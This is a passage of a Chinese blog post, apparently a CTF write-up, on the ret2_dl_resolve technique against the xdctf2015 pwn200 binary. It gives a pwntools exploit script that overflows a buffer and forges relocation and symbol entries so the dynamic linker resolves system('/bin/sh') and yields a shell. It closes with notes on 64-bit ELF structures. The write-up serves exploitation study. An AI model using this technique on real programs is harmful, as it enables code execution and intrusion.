<img src="/2022/02/04/ret2_dl_resolve/pwn200-task3.jpg" class>

<p>可见用我们伪造的 Sym 结构体同样能让 _dl_runtime_resolve 函数完成解析，输出我们的’/bin/sh’</p>
<h5 id="stage3"><a href="#stage3" class="headerlink" title="stage3"></a>stage3</h5><p>现在我们只差最后一步，即改变我们伪造的 Sym 结构体中的 st_name，使最后索引到的字符串是我们构造的字符串。因为符号表字符串是通过 strtab + sym-&gt;st_name 的方式找到的，所以这部分就很简单了，只需要稍微修改一下 stage2 的exp即可：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">dynsym = <span class="number">0x080481cc</span></span><br><span class="line">dynstr = <span class="number">0x0804826c</span></span><br><span class="line">fake_sym_addr = base_stage + <span class="number">36</span></span><br><span class="line">align = <span class="number">0x10</span> - ((fake_sym_addr - dynsym) &amp; <span class="number">0xf</span>)</span><br><span class="line">fake_sym_addr = fake_sym_addr + align</span><br><span class="line">r_info = ((fake_sym_addr - dynsym)/<span class="number">0x10</span>&lt;&lt;<span class="number">8</span>)|<span class="number">0x7</span></span><br><span class="line">fake_rel = p32(elf.got[<span class="string">&#x27;write&#x27;</span>]) + p32(r_info)</span><br><span class="line">fake_rel_addr = base_stage + <span class="number">28</span></span><br><span class="line">reloc_arg = fake_rel_addr - rel_plt</span><br><span class="line"></span><br><span class="line">system_addr = base_stage + <span class="number">100</span></span><br><span class="line">st_name = system_addr - dynstr</span><br><span class="line">fake_sym = p32(st_name) + p32(<span class="number">0</span>) + p32(<span class="number">0</span>) + p32(<span class="number">0x12</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x70</span> + p32(elf.plt[<span class="string">&#x27;read&#x27;</span>]) + p32(p3_ret) + p32(<span class="number">0</span>) + p32(base_stage) + p32(<span class="number">0x100</span>) + p32(pop_ebp) + p32(base_stage) + p32(leave_ret)</span><br><span class="line">p.sendlineafter(<span class="string">&quot;Welcome to XDCTF2015~!\n&quot;</span>,payload)</span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;aaaa&#x27;</span></span><br><span class="line">payload += p32(plt0)</span><br><span class="line">payload += p32(reloc_arg)</span><br><span class="line">payload += <span class="string">&#x27;aaaa&#x27;</span></span><br><span class="line">payload += p32(binsh_addr) <span class="comment">#这里直接改成binsh_addr作为system的参数即可，后面不删否则会改变前面布置的偏移</span></span><br><span class="line">payload += p32(binsh_addr)</span><br><span class="line">payload += p32(<span class="built_in">len</span>(binsh))</span><br><span class="line"><span class="comment">#fake_rel</span></span><br><span class="line">payload += fake_rel</span><br><span class="line"><span class="comment">#fake_sym</span></span><br><span class="line">payload += <span class="string">&#x27;a&#x27;</span>*align</span><br><span class="line">payload += fake_sym</span><br><span class="line">payload = payload.ljust(<span class="number">80</span>,<span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">payload += binsh</span><br><span class="line">payload = payload.ljust(<span class="number">100</span>,<span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">payload += <span class="string">&#x27;system\x00&#x27;</span></span><br><span class="line">p.sendline(payload)</span><br></pre></td></tr></table></figure>

<p>我们再执行一下，发现已经得到shell了</p>
<img src="/2022/02/04/ret2_dl_resolve/pwn200-task4.jpg" class>

<h3 id="64位下"><a href="#64位下" class="headerlink" title="64位下"></a>64位下</h3><ul>
<li><p>64位的变化</p>
<ul>
<li><p>glibc 中默认编译使用的是 <code>ELF_Rela</code> 来记录重定位项的内容</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  Elf64_Addr        r_offset;                <span class="comment">/* Address */</span></span><br><span class="line">  Elf64_Xword        r_info;                        <span class="comment">/* Relocation type and symbol index */</span></span><br><span class="line">  Elf64_Sxword        r_addend;                <span class="comment">/* Addend */</span></span><br><span class="line">&#125; Elf64_Rela;</span><br><span class="line"><span class="comment">/* How to extract and insert information held in the r_info field.  */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> ELF64_R_SYM(i)                        ((i) &gt;&gt; 32)</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> ELF64_R_TYPE(i)                        ((i) &amp; 0xffffffff)</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> ELF64_R_INFO(sym,type)                ((((Elf64_Xword) (sym)) &lt;&lt; 32) + (type))</span></span><br></pre></td></tr></table></figure>

<p>这里 Elf64_Addr、Elf64_Xword、Elf64_Sxword 都为 64 位，因此 Elf64_Rela 结构体的大小为 24 字节。</p>
</li>
<li><p>Elf64_Sym 结构体为</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">  Elf64_Word        st_name;                <span class="comment">/* Symbol name (string tbl index) */</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">char</span>        st_info;                <span class="comment">/* Symbol type and binding */</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">char</span> st_other;                <span class="comment">/* Symbol visibility */</span></span><br><span class="line">  Elf64_Section        st_shndx;                <span class="comment">/* Section index */</span></span><br><span class="line">  Elf64_Addr        st_value;                <span class="comment">/* Symbol value */</span></span><br><span class="line">  Elf64_Xword        st_size;                <span class="comment">/* Symbol size */</span></span><br><span class="line">&#125; Elf64_Sym;</span><br></pre></td></tr></table></figure>

<p>其中Elf64_Word 32 位、Elf64_Section 16 位、Elf64_Addr 64 位、Elf64_Xword 64 位，所以，Elf64_Sym 的大小为 24 个字节。</p>
</li>
</ul>
</li>
</ul>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/ret2-dl-resolve/" rel="tag"># ret2_dl_resolve</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/01/31/BROP/" rel="prev" title="BROP">
      <i class="fa fa-chevron-left"></i> BROP
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/02/13/pwntools/" rel="next" title="pwntools">
      pwntools <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9"><span class="nav-number">1.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#xdctf2015-pwn200"><span class="nav-number">2.</span> <span class="nav-text">xdctf2015_pwn200</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#stage-1"><span class="nav-number">2.0.0.1.</span> <span class="nav-text">stage 1</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#stage-2"><span class="nav-number">2.0.0.2.</span> <span class="nav-text">stage 2</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#stage3"><span class="nav-number">2.0.0.3.</span> <span class="nav-text">stage3</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#64%E4%BD%8D%E4%B8%8B"><span class="nav-number">2.1.</span> <span class="nav-text">64位下</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">49</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">32</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
